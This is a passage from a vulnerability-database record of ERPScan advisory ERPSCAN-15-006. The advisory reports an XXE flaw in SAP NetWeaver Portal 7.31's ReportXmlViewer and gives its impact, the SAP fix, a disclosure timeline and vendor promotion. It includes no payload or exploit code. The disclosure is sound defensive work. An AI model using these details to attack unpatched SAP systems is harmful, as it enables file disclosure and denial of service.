parser opens external entities referenced within an XML input, which can then lead to malicious content being parsed.\r\nThis malicious content can reference internal resources, such as files.\r\nThese internal resources can be disclosed in the response to the request, or can be used to perform a denial of service attack on the parsing system, rendering the application content temporarily unavailable.\r\n\r\n\r\n4. VULNERABLE PACKAGES\r\nSAP NetWeaver Portal 7.31\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\nTo correct this vulnerability, install SAP Security Note 2111939.\r\n\r\n\r\n6. AUTHOR\r\nVahagn Vardanyan (ERPScan)\r\n\r\n\r\n7. TECHNICAL DESCRIPTION\r\nSAP XML parser validates all incoming XML requests with a user-specified DTD.\r\n\r\n\r\n8. REPORT TIMELINE\r\nSent: 09.12.2014\r\nReported: 09.12.2014\r\nVendor response: 10.12.2014\r\nDate of Public Advisory: 18.06.2015\r\n\r\n\r\n9. REFERENCES\r\nhttp://erpscan.com/advisories/erpscan-15-006-sap-netweaver-portal-reportxmlviewer-xxe/\r\n\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of ERPScan, which is engaged in vulnerability research and analysis of critical enterprise applications. It has achieved multiple acknowledgments from the largest software vendors like SAP, Oracle, Microsoft, IBM, VMware, HP for discovering more than 400 vulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of vulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be nominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+ prime international security conferences in 25+ countries across the continents. These include BlackHat, RSA, HITB, and private SAP trainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on enterprise application security research and awareness. They have published 3 exhaustive annual award-winning surveys about SAP security.\r\nERPScan experts have been interviewed by leading media resources and featured in specialized info-sec publications worldwide. These include Reuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many different fields of security, from web applications and mobile/embedded to reverse engineering and ICS/SCADA systems, accumulating their experience to conduct the best SAP security research.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application Security providers. Founded in 2010, the company operates globally. Named an Emerging vendor in Security by CRN and distinguished by more than 25 other awards, ERPScan is the leading SAP SE partner in discovering and resolving security vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to improve the security of their latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and business security. We provide solutions to secure ERP systems and business-critical applications from both cyber attacks and internal fraud. Our clients are usually large enterprises, Fortune 2000 companies, and managed service providers whose requirements are to actively monitor and manage the security of vast SAP landscapes on a global scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP. This multi award-winning innovative software is the only solution on the market certified by SAP SE covering all tiers of SAP security: vulnerability assessment, source code review, and Segregation of Duties. The largest companies from diverse industries like oil and gas, banking, retail, even nuclear power installations as well as consulting companies have successfully deployed the software. ERPScan Security Monitoring Suite for SAP is specifically designed for enterprises to continuously monitor changes in multiple SAP systems. It generates and analyzes trends in user friendly dashboards, manages risks, tasks, and can export results to external systems. These features enable central management of SAP system security with minimal time and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands and the US to operate local offices and partner network spanning 20+ countries around the globe. This enables monitoring cyber threats in real time and providing agile customer support.\r\n\r\nAddress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA, 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\nhttp://erpscan.com\r\n", "edition": 1, "modified": "2015-06-29T00:00:00", "published": "2015-06-29T00:00:00", "id": "SECURITYVULNS:DOC:32257", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32257", "title": "[ERPSCAN-15-006] SAP NetWeaver Portal ReportXmlViewer - XXE", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}]}